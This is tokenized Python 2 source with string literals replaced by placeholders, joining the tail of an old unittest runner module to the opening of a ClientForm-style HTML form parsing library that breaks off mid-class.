( TestResult ) : <EOL> """<STR_LIT>""" <EOL> separator1 = '<STR_LIT:=>' * <NUM_LIT> <EOL> separator2 = '<STR_LIT:->' * <NUM_LIT> <EOL> def __init__ ( self , stream , descriptions , verbosity ) : <EOL> TestResult . __init__ ( self ) <EOL> self . stream = stream <EOL> self . showAll = verbosity > <NUM_LIT:1> <EOL> self . dots = verbosity == <NUM_LIT:1> <EOL> self . descriptions = descriptions <EOL> def getDescription ( self , test ) : <EOL> if self . descriptions : <EOL> return test . shortDescription ( ) or str ( test ) <EOL> else : <EOL> return str ( test ) <EOL> def startTest ( self , test ) : <EOL> TestResult . startTest ( self , test ) <EOL> if self . showAll : <EOL> self . stream . write ( self . getDescription ( test ) ) <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> self . stream . flush ( ) <EOL> def addSuccess ( self , test ) : <EOL> TestResult . addSuccess ( self , test ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:.>' ) <EOL> self . stream . flush ( ) <EOL> def addError ( self , test , err ) : <EOL> TestResult . addError ( self , test , err ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:E>' ) <EOL> self . stream . flush ( ) <EOL> def addFailure ( self , test , err ) : <EOL> TestResult . addFailure ( self , test , err ) <EOL> if self . showAll : <EOL> self . stream . writeln ( "<STR_LIT>" ) <EOL> elif self . dots : <EOL> self . stream . write ( '<STR_LIT:F>' ) <EOL> self . stream . flush ( ) <EOL> def printErrors ( self ) : <EOL> if self . dots or self . showAll : <EOL> self . stream . writeln ( ) <EOL> self . printErrorList ( '<STR_LIT>' , self . errors ) <EOL> self . printErrorList ( '<STR_LIT>' , self . failures ) <EOL> def printErrorList ( self , flavour , errors ) : <EOL> for test , err in errors : <EOL> self . stream . writeln ( self . separator1 ) <EOL> self . stream . writeln ( "<STR_LIT>" % ( flavour , self . getDescription ( test ) ) ) <EOL> self . stream . writeln ( self . separator2 ) <EOL> self . stream . writeln ( "<STR_LIT:%s>" % err ) <EOL> class TextTestRunner : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream = sys . stderr , descriptions = <NUM_LIT:1> , verbosity = <NUM_LIT:1> ) : <EOL> self . stream = _WritelnDecorator ( stream ) <EOL> self . descriptions = descriptions <EOL> self . verbosity = verbosity <EOL> def _makeResult ( self ) : <EOL> return _TextTestResult ( self . stream , self . descriptions , self . verbosity ) <EOL> def run ( self , test ) : <EOL> "<STR_LIT>" <EOL> result = self . _makeResult ( ) <EOL> startTime = time . time ( ) <EOL> test ( result ) <EOL> stopTime = time . time ( ) <EOL> timeTaken = stopTime - startTime <EOL> result . printErrors ( ) <EOL> self . stream . writeln ( result . separator2 ) <EOL> run = result . testsRun <EOL> self . stream . writeln ( "<STR_LIT>" % <EOL> ( run , run != <NUM_LIT:1> and "<STR_LIT:s>" or "<STR_LIT>" , timeTaken ) ) <EOL> self . stream . writeln ( ) <EOL> if not result . wasSuccessful ( ) : <EOL> self . stream . write ( "<STR_LIT>" ) <EOL> failed , errored = map ( len , ( result . failures , result . errors ) ) <EOL> if failed : <EOL> self . stream . write ( "<STR_LIT>" % failed ) <EOL> if errored : <EOL> if failed : self . stream . write ( "<STR_LIT:U+002CU+0020>" ) <EOL> self . stream . write ( "<STR_LIT>" % errored ) <EOL> self . stream . writeln ( "<STR_LIT:)>" ) <EOL> else : <EOL> self . stream . writeln ( "<STR_LIT:OK>" ) <EOL> return result <EOL> class TestProgram : <EOL> """<STR_LIT>""" <EOL> USAGE = """<STR_LIT>""" <EOL> def __init__ ( self , module = '<STR_LIT:__main__>' , defaultTest = None , <EOL> argv = None , testRunner = TextTestRunner , <EOL> testLoader = defaultTestLoader ) : <EOL> if type ( module ) == type ( '<STR_LIT>' ) : <EOL> self . module = __import__ ( module ) <EOL> for part in module . split ( '<STR_LIT:.>' ) [ <NUM_LIT:1> : ] : <EOL> self . module = getattr ( self . module , part ) <EOL> else : <EOL> self . module = module <EOL> if argv is None : <EOL> argv = sys . argv <EOL> self . verbosity = <NUM_LIT:1> <EOL> self . defaultTest = defaultTest <EOL> self . testRunner = testRunner <EOL> self . testLoader = testLoader <EOL> self . progName = os . path . basename ( argv [ <NUM_LIT:0> ] ) <EOL> self . parseArgs ( argv ) <EOL> self . runTests ( ) <EOL> def usageExit ( self , msg = None ) : <EOL> if msg : print msg <EOL> print self . USAGE % self . __dict__ <EOL> sys . exit ( <NUM_LIT:2> ) <EOL> def parseArgs ( self , argv ) : <EOL> import getopt <EOL> try : <EOL> options , args = getopt . getopt ( argv [ <NUM_LIT:1> : ] , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> for opt , value in options : <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . usageExit ( ) <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . verbosity = <NUM_LIT:0> <EOL> if opt in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . verbosity = <NUM_LIT:2> <EOL> if len ( args ) == <NUM_LIT:0> and self . defaultTest is None : <EOL> self . test = self . testLoader . loadTestsFromModule ( self . module ) <EOL> return <EOL> if len ( args ) > <NUM_LIT:0> : <EOL> self . testNames = args <EOL> else : <EOL> self . testNames = ( self . defaultTest , ) <EOL> self . createTests ( ) <EOL> except getopt . error , msg : <EOL> self . usageExit ( msg ) <EOL> def createTests ( self ) : <EOL> self . test = self . testLoader . loadTestsFromNames ( self . testNames , <EOL> self . module ) <EOL> def runTests ( self ) : <EOL> if isinstance ( self . testRunner , ( type , types . ClassType ) ) : <EOL> try : <EOL> testRunner = self . testRunner ( verbosity = self . verbosity ) <EOL> except TypeError : <EOL> testRunner = self . testRunner ( ) <EOL> else : <EOL> testRunner = self . testRunner <EOL> result = testRunner . run ( self . test ) <EOL> sys . exit ( not result . wasSuccessful ( ) ) <EOL> main = TestProgram <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( module = None ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : True <EOL> except NameError : <EOL> True = <NUM_LIT:1> <EOL> False = <NUM_LIT:0> <EOL> try : bool <EOL> except NameError : <EOL> def bool ( expr ) : <EOL> if expr : return True <EOL> else : return False <EOL> try : <EOL> import logging <EOL> import inspect <EOL> except ImportError : <EOL> def debug ( msg , * args , ** kwds ) : <EOL> pass <EOL> else : <EOL> _logger = logging . getLogger ( "<STR_LIT>" ) <EOL> OPTIMIZATION_HACK = True <EOL> def debug ( msg , * args , ** kwds ) : <EOL> if OPTIMIZATION_HACK : <EOL> return <EOL> caller_name = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> extended_msg = '<STR_LIT>' % msg <EOL> extended_args = ( caller_name , ) + args <EOL> debug = _logger . debug ( extended_msg , * extended_args , ** kwds ) <EOL> def _show_debug_messages ( ) : <EOL> global OPTIMIZATION_HACK <EOL> OPTIMIZATION_HACK = False <EOL> _logger . setLevel ( logging . DEBUG ) <EOL> handler = logging . StreamHandler ( sys . stdout ) <EOL> handler . setLevel ( logging . DEBUG ) <EOL> _logger . addHandler ( handler ) <EOL> import sys , urllib , urllib2 , types , mimetools , copy , urlparse , htmlentitydefs , re , random <EOL> from cStringIO import StringIO <EOL> import sgmllib <EOL> sgmllib . charref = re . compile ( "<STR_LIT>" ) <EOL> try : <EOL> import HTMLParser <EOL> except ImportError : <EOL> HAVE_MODULE_HTMLPARSER = False <EOL> else : <EOL> HAVE_MODULE_HTMLPARSER = True <EOL> try : <EOL> import warnings <EOL> except ImportError : <EOL> def deprecation ( message , stack_offset = <NUM_LIT:0> ) : <EOL> pass <EOL> else : <EOL> def deprecation ( message , stack_offset = <NUM_LIT:0> ) : <EOL> warnings . warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> + stack_offset ) <EOL> VERSION = "<STR_LIT>" <EOL> CHUNK = <NUM_LIT> <EOL> DEFAULT_ENCODING = "<STR_LIT>" <EOL> class Missing : pass <EOL> _compress_re = re . compile ( r"<STR_LIT>" ) <EOL> def compress_text ( text ) : return _compress_re . sub ( "<STR_LIT:U+0020>" , text . strip ( ) ) <EOL> def normalize_line_endings ( text ) : <EOL> return re . sub ( r"<STR_LIT>" , "<STR_LIT:\r\n>" , text ) <EOL> def urlencode ( query , doseq = False , ) : <EOL> """<STR_LIT>""" <EOL> if hasattr ( query , "<STR_LIT>" ) : <EOL> query = query . items ( ) <EOL> else : <EOL> try : <EOL> x = len ( query ) <EOL> if len ( query ) and type ( query [ <NUM_LIT:0> ] ) != types . TupleType : <EOL> raise TypeError ( ) <EOL> except TypeError : <EOL> ty , va , tb = sys . exc_info ( ) <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT:object>" , tb ) <EOL> l = [ ] <EOL> if not doseq : <EOL> for k , v in query : <EOL> k = urllib . quote_plus ( str ( k ) ) <EOL> v = urllib . quote_plus ( str ( v ) ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> for k , v in query : <EOL> k = urllib . quote_plus ( str ( k ) ) <EOL> if type ( v ) == types . StringType : <EOL> v = urllib . quote_plus ( v ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> elif type ( v ) == types . UnicodeType : <EOL> v = urllib . quote_plus ( v . encode ( "<STR_LIT>" , "<STR_LIT:replace>" ) ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> try : <EOL> x = len ( v ) <EOL> except TypeError : <EOL> v = urllib . quote_plus ( str ( v ) ) <EOL> l . append ( k + '<STR_LIT:=>' + v ) <EOL> else : <EOL> for elt in v : <EOL> l . append ( k + '<STR_LIT:=>' + urllib . quote_plus ( str ( elt ) ) ) <EOL> return '<STR_LIT:&>' . join ( l ) <EOL> def unescape ( data , entities , encoding = DEFAULT_ENCODING ) : <EOL> if data is None or "<STR_LIT:&>" not in data : <EOL> return data <EOL> def replace_entities ( match , entities = entities , encoding = encoding ) : <EOL> ent = match . group ( ) <EOL> if ent [ <NUM_LIT:1> ] == "<STR_LIT:#>" : <EOL> return unescape_charref ( ent [ <NUM_LIT:2> : - <NUM_LIT:1> ] , encoding ) <EOL> repl = entities . get ( ent ) <EOL> if repl is not None : <EOL> if type ( repl ) != type ( "<STR_LIT>" ) : <EOL> try : <EOL> repl = repl . encode ( encoding ) <EOL> except UnicodeError : <EOL> repl = ent <EOL> else : <EOL> repl = ent <EOL> return repl <EOL> return re . sub ( r"<STR_LIT>" , replace_entities , data ) <EOL> def unescape_charref ( data , encoding ) : <EOL> name , base = data , <NUM_LIT:10> <EOL> if name . startswith ( "<STR_LIT:x>" ) : <EOL> name , base = name [ <NUM_LIT:1> : ] , <NUM_LIT:16> <EOL> uc = unichr ( int ( name , base ) ) <EOL> if encoding is None : <EOL> return uc <EOL> else : <EOL> try : <EOL> repl = uc . encode ( encoding ) <EOL> except UnicodeError : <EOL> repl = "<STR_LIT>" % data <EOL> return repl <EOL> def get_entitydefs ( ) : <EOL> import htmlentitydefs <EOL> from codecs import latin_1_decode <EOL> entitydefs = { } <EOL> try : <EOL> htmlentitydefs . name2codepoint <EOL> except AttributeError : <EOL> entitydefs = { } <EOL> for name , char in htmlentitydefs . entitydefs . items ( ) : <EOL> uc = latin_1_decode ( char ) [ <NUM_LIT:0> ] <EOL> if uc . startswith ( "<STR_LIT>" ) and uc . endswith ( "<STR_LIT:;>" ) : <EOL> uc = unescape_charref ( uc [ <NUM_LIT:2> : - <NUM_LIT:1> ] , None ) <EOL> entitydefs [ "<STR_LIT>" % name ] = uc <EOL> else : <EOL> for name , codepoint in htmlentitydefs . name2codepoint . items ( ) : <EOL> entitydefs [ "<STR_LIT>" % name ] = unichr ( codepoint ) <EOL> return entitydefs <EOL> def issequence ( x ) : <EOL> try : <EOL> x [ <NUM_LIT:0> ] <EOL> except ( TypeError , KeyError ) : <EOL> return False <EOL> except IndexError : <EOL> pass <EOL> return True <EOL> def isstringlike ( x ) : <EOL> try : x + "<STR_LIT>" <EOL> except : return False <EOL> else : return True <EOL> def choose_boundary ( ) : <EOL> """<STR_LIT>""" <EOL> nonce = "<STR_LIT>" . join ( [ str ( random . randint ( <NUM_LIT:0> , sys . maxint - <NUM_LIT:1> ) ) for i in <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] ) <EOL> return "<STR_LIT:->" * <NUM_LIT> + nonce <EOL> class MimeWriter : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , fp , http_hdrs = None ) : <EOL> self . _http_hdrs = http_hdrs <EOL> self . _fp = fp <EOL> self . _headers = [ ] <EOL> self . _boundary = [ ] <EOL> self . _first_part = True <EOL> def addheader ( self , key , value , prefix = <NUM_LIT:0> , <EOL> add_to_http_hdrs = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> lines = value . split ( "<STR_LIT:\r\n>" ) <EOL> while lines and not lines [ - <NUM_LIT:1> ] : del lines [ - <NUM_LIT:1> ] <EOL> while lines and not lines [ <NUM_LIT:0> ] : del lines [ <NUM_LIT:0> ] <EOL> if add_to_http_hdrs : <EOL> value = "<STR_LIT>" . join ( lines ) <EOL> self . _http_hdrs . append ( ( key . capitalize ( ) , value ) ) <EOL> else : <EOL> for i in range ( <NUM_LIT:1> , len ( lines ) ) : <EOL> lines [ i ] = "<STR_LIT:U+0020>" + lines [ i ] . strip ( ) <EOL> value = "<STR_LIT:\r\n>" . join ( lines ) + "<STR_LIT:\r\n>" <EOL> line = key . title ( ) + "<STR_LIT>" + value <EOL> if prefix : <EOL> self . _headers . insert ( <NUM_LIT:0> , line ) <EOL> else : <EOL> self . _headers . append ( line ) <EOL> def flushheaders ( self ) : <EOL> self . _fp . writelines ( self . _headers ) <EOL> self . _headers = [ ] <EOL> def startbody ( self , ctype = None , plist = [ ] , prefix = <NUM_LIT:1> , <EOL> add_to_http_hdrs = <NUM_LIT:0> , content_type = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> if content_type and ctype : <EOL> for name , value in plist : <EOL> ctype = ctype + '<STR_LIT>' % ( name , value ) <EOL> self . addheader ( "<STR_LIT:Content-Type>" , ctype , prefix = prefix , <EOL> add_to_http_hdrs = add_to_http_hdrs ) <EOL> self . flushheaders ( ) <EOL> if not add_to_http_hdrs : self . _fp . write ( "<STR_LIT:\r\n>" ) <EOL> self . _first_part = True <EOL> return self . _fp <EOL> def startmultipartbody ( self , subtype , boundary = None , plist = [ ] , prefix = <NUM_LIT:1> , <EOL> add_to_http_hdrs = <NUM_LIT:0> , content_type = <NUM_LIT:1> ) : <EOL> boundary = boundary or choose_boundary ( ) <EOL> self . _boundary . append ( boundary ) <EOL> return self . startbody ( "<STR_LIT>" + subtype , <EOL> [ ( "<STR_LIT>" , boundary ) ] + plist , <EOL> prefix = prefix , <EOL> add_to_http_hdrs = add_to_http_hdrs , <EOL> content_type = content_type ) <EOL> def nextpart ( self ) : <EOL> boundary = self . _boundary [ - <NUM_LIT:1> ] <EOL> if self . _first_part : <EOL> self . _first_part = False <EOL> else : <EOL> self . _fp . write ( "<STR_LIT:\r\n>" ) <EOL> self . _fp . write ( "<STR_LIT>" + boundary + "<STR_LIT:\r\n>" ) <EOL> return self . __class__ ( self . _fp ) <EOL> def lastpart ( self ) : <EOL> if self . _first_part : <EOL> self . nextpart ( ) <EOL> boundary = self . _boundary . pop ( ) <EOL> self . _fp . write ( "<STR_LIT>" + boundary + "<STR_LIT>" ) <EOL> class LocateError ( ValueError ) : pass <EOL> class AmbiguityError ( LocateError ) : pass <EOL> class ControlNotFoundError ( LocateError ) : pass <EOL> class ItemNotFoundError ( LocateError ) : pass <EOL> class ItemCountError ( ValueError ) : pass <EOL> if HAVE_MODULE_HTMLPARSER : <EOL> SGMLLIB_PARSEERROR = sgmllib . SGMLParseError <EOL> class ParseError ( sgmllib . SGMLParseError , <EOL> HTMLParser . HTMLParseError , <EOL> ) : <EOL> pass <EOL> else : <EOL> if hasattr ( sgmllib , "<STR_LIT>" ) : <EOL> SGMLLIB_PARSEERROR = sgmllib . SGMLParseError <EOL> class ParseError ( sgmllib . SGMLParseError ) : <EOL> pass <EOL> else : <EOL> SGMLLIB_PARSEERROR = RuntimeError <EOL> class ParseError ( RuntimeError ) : <EOL> pass <EOL> class _AbstractFormParser : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> if entitydefs is None : <EOL> entitydefs = get_entitydefs ( ) <EOL> self . _entitydefs = entitydefs <EOL> self . _encoding = encoding <EOL> self . base = None <EOL> self . forms = [ ] <EOL> self . labels = [ ] <EOL> self . _current_label = None <EOL> self . _current_form = None <EOL> self . _select = None <EOL> self . _optgroup = None <EOL> self . _option = None <EOL> self . _textarea = None <EOL> self . _global_form = None <EOL> self . start_form ( [ ] ) <EOL> self . end_form ( ) <EOL> self . _current_form = self . _global_form = self . forms [ <NUM_LIT:0> ] <EOL> def do_base ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> for key , value in attrs : <EOL> if key == "<STR_LIT>" : <EOL> self . base = self . unescape_attr_if_required ( value ) <EOL> def end_body ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _current_label is not None : <EOL> self . end_label ( ) <EOL> if self . _current_form is not self . _global_form : <EOL> self . end_form ( ) <EOL> def start_form ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _current_form is not self . _global_form : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> name = None <EOL> action = None <EOL> enctype = "<STR_LIT>" <EOL> method = "<STR_LIT:GET>" <EOL> d = { } <EOL> for key , value in attrs : <EOL> if key == "<STR_LIT:name>" : <EOL> name = self . unescape_attr_if_required ( value ) <EOL> elif key == "<STR_LIT:action>" : <EOL> action = self . unescape_attr_if_required ( value ) <EOL> elif key == "<STR_LIT>" : <EOL> method = self . unescape_attr_if_required ( value . upper ( ) ) <EOL> elif key == "<STR_LIT>" : <EOL> enctype = self . unescape_attr_if_required ( value . lower ( ) ) <EOL> d [ key ] = self . unescape_attr_if_required ( value ) <EOL> controls = [ ] <EOL> self . _current_form = ( name , action , method , enctype ) , d , controls <EOL> def end_form ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _current_label is not None : <EOL> self . end_label ( ) <EOL> if self . _current_form is self . _global_form : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> self . forms . append ( self . _current_form ) <EOL> self . _current_form = self . _global_form <EOL> def start_select ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _select is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _textarea is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _select = d <EOL> self . _add_label ( d ) <EOL> self . _append_select_control ( { "<STR_LIT>" : d } ) <EOL> def end_select ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _option is not None : <EOL> self . _end_option ( ) <EOL> self . _select = None <EOL> def start_optgroup ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _optgroup = d <EOL> def end_optgroup ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _optgroup is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> self . _optgroup = None <EOL> def _start_option ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _select is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _option is not None : <EOL> self . _end_option ( ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _option = { } <EOL> self . _option . update ( d ) <EOL> if ( self . _optgroup and self . _optgroup . has_key ( "<STR_LIT>" ) and <EOL> not self . _option . has_key ( "<STR_LIT>" ) ) : <EOL> self . _option [ "<STR_LIT>" ] = None <EOL> def _end_option ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _option is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> contents = self . _option . get ( "<STR_LIT>" , "<STR_LIT>" ) . strip ( ) <EOL> self . _option [ "<STR_LIT>" ] = contents <EOL> if not self . _option . has_key ( "<STR_LIT:value>" ) : <EOL> self . _option [ "<STR_LIT:value>" ] = contents <EOL> if not self . _option . has_key ( "<STR_LIT:label>" ) : <EOL> self . _option [ "<STR_LIT:label>" ] = contents <EOL> self . _option [ "<STR_LIT>" ] = self . _select <EOL> self . _append_select_control ( self . _option ) <EOL> self . _option = None <EOL> def _append_select_control ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> name = self . _select . get ( "<STR_LIT:name>" ) <EOL> controls . append ( ( "<STR_LIT>" , name , attrs ) ) <EOL> def start_textarea ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _textarea is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> if self . _select is not None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> self . _add_label ( d ) <EOL> self . _textarea = d <EOL> def end_textarea ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> if self . _textarea is None : <EOL> raise ParseError ( "<STR_LIT>" ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> name = self . _textarea . get ( "<STR_LIT:name>" ) <EOL> controls . append ( ( "<STR_LIT>" , name , self . _textarea ) ) <EOL> self . _textarea = None <EOL> def start_label ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> if self . _current_label : <EOL> self . end_label ( ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> taken = bool ( d . get ( "<STR_LIT>" ) ) <EOL> d [ "<STR_LIT>" ] = "<STR_LIT>" <EOL> d [ "<STR_LIT>" ] = taken <EOL> if taken : <EOL> self . labels . append ( d ) <EOL> self . _current_label = d <EOL> def end_label ( self ) : <EOL> debug ( "<STR_LIT>" ) <EOL> label = self . _current_label <EOL> if label is None : <EOL> return <EOL> self . _current_label = None <EOL> del label [ "<STR_LIT>" ] <EOL> def _add_label ( self , d ) : <EOL> if self . _current_label is not None : <EOL> if not self . _current_label [ "<STR_LIT>" ] : <EOL> self . _current_label [ "<STR_LIT>" ] = True <EOL> d [ "<STR_LIT>" ] = self . _current_label <EOL> def handle_data ( self , data ) : <EOL> debug ( "<STR_LIT:%s>" , data ) <EOL> if self . _option is not None : <EOL> map = self . _option <EOL> key = "<STR_LIT>" <EOL> elif self . _textarea is not None : <EOL> map = self . _textarea <EOL> key = "<STR_LIT:value>" <EOL> data = normalize_line_endings ( data ) <EOL> elif self . _current_label is not None : <EOL> map = self . _current_label <EOL> key = "<STR_LIT>" <EOL> else : <EOL> return <EOL> if data and not map . has_key ( key ) : <EOL> if data [ <NUM_LIT:0> : <NUM_LIT:2> ] == "<STR_LIT:\r\n>" : <EOL> data = data [ <NUM_LIT:2> : ] <EOL> elif data [ <NUM_LIT:0> : <NUM_LIT:1> ] in [ "<STR_LIT:\n>" , "<STR_LIT:\r>" ] : <EOL> data = data [ <NUM_LIT:1> : ] <EOL> map [ key ] = data <EOL> else : <EOL> map [ key ] = map [ key ] + data <EOL> def do_button ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> d [ "<STR_LIT:type>" ] = "<STR_LIT>" <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> type = d [ "<STR_LIT:type>" ] <EOL> name = d . get ( "<STR_LIT:name>" ) <EOL> type = type + "<STR_LIT>" <EOL> self . _add_label ( d ) <EOL> controls . append ( ( type , name , d ) ) <EOL> def do_input ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> d [ "<STR_LIT:type>" ] = "<STR_LIT:text>" <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> type = d [ "<STR_LIT:type>" ] <EOL> name = d . get ( "<STR_LIT:name>" ) <EOL> self . _add_label ( d ) <EOL> controls . append ( ( type , name , d ) ) <EOL> def do_isindex ( self , attrs ) : <EOL> debug ( "<STR_LIT:%s>" , attrs ) <EOL> d = { } <EOL> for key , val in attrs : <EOL> d [ key ] = self . unescape_attr_if_required ( val ) <EOL> controls = self . _current_form [ <NUM_LIT:2> ] <EOL> self . _add_label ( d ) <EOL> controls . append ( ( "<STR_LIT>" , None , d ) ) <EOL> def handle_entityref ( self , name ) : <EOL> self . handle_data ( unescape ( <EOL> '<STR_LIT>' % name , self . _entitydefs , self . _encoding ) ) <EOL> def handle_charref ( self , name ) : <EOL> self . handle_data ( unescape_charref ( name , self . _encoding ) ) <EOL> def unescape_attr ( self , name ) : <EOL> return unescape ( name , self . _entitydefs , self . _encoding ) <EOL> def unescape_attrs ( self , attrs ) : <EOL> escaped_attrs = { } <EOL> for key , val in attrs . items ( ) : <EOL> try : <EOL> val . items <EOL> except AttributeError : <EOL> escaped_attrs [ key ] = self . unescape_attr ( val ) <EOL> else : <EOL> escaped_attrs [ key ] = self . unescape_attrs ( val ) <EOL> return escaped_attrs <EOL> def unknown_entityref ( self , ref ) : self . handle_data ( "<STR_LIT>" % ref ) <EOL> def unknown_charref ( self , ref ) : self . handle_data ( "<STR_LIT>" % ref ) <EOL> if not HAVE_MODULE_HTMLPARSER : <EOL> class XHTMLCompatibleFormParser : <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> else : <EOL> class XHTMLCompatibleFormParser ( _AbstractFormParser , HTMLParser . HTMLParser ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , entitydefs = None , encoding = DEFAULT_ENCODING ) : <EOL> HTMLParser . HTMLParser . __init__ ( self ) <EOL> _AbstractFormParser . __init__ ( self , entitydefs , encoding ) <EOL> def feed ( self , data ) : <EOL> try : <EOL> HTMLParser . HTMLParser . feed ( self , data ) <EOL> except HTMLParser . HTMLParseError , exc : <EOL> raise ParseError ( exc ) <EOL> def start_option ( self , attrs ) : <EOL> _AbstractFormParser . _start_option ( self , attrs ) <EOL> def end_option ( self ) : <EOL> _AbstractFormParser . _end_option ( self ) <EOL> def handle_starttag ( self , tag , attrs ) : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> method ( attrs ) <EOL> else : <EOL> method ( attrs ) <EOL> def handle_endtag ( self , tag ) : <EOL> try : <EOL> method = getattr ( self , "<STR_LIT>" + tag ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> method ( ) <EOL> def unescape ( self , name ) : <EOL> return self . unescape_attr ( name ) <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return name <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return attrs <EOL> def close ( self ) : <EOL> HTMLParser . HTMLParser . close ( self ) <EOL> self . end_body ( ) <EOL> class _AbstractSgmllibParser ( _AbstractFormParser ) : <EOL> def do_option ( self , attrs ) : <EOL> _AbstractFormParser . _start_option ( self , attrs ) <EOL> if sys . version_info [ : <NUM_LIT:2> ] >= ( <NUM_LIT:2> , <NUM_LIT:5> ) : <EOL> entity_or_charref = re . compile ( <EOL> '<STR_LIT>' ) <EOL> def convert_entityref ( self , name ) : <EOL> return unescape ( "<STR_LIT>" % name , self . _entitydefs , self . _encoding ) <EOL> def convert_charref ( self , name ) : <EOL> return unescape_charref ( "<STR_LIT:%s>" % name , self . _encoding ) <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return name <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return attrs <EOL> else : <EOL> def unescape_attr_if_required ( self , name ) : <EOL> return self . unescape_attr ( name ) <EOL> def unescape_attrs_if_required ( self , attrs ) : <EOL> return self . unescape_attrs ( attrs ) <EOL> class FormParser ( _AbstractSgmllibParser , 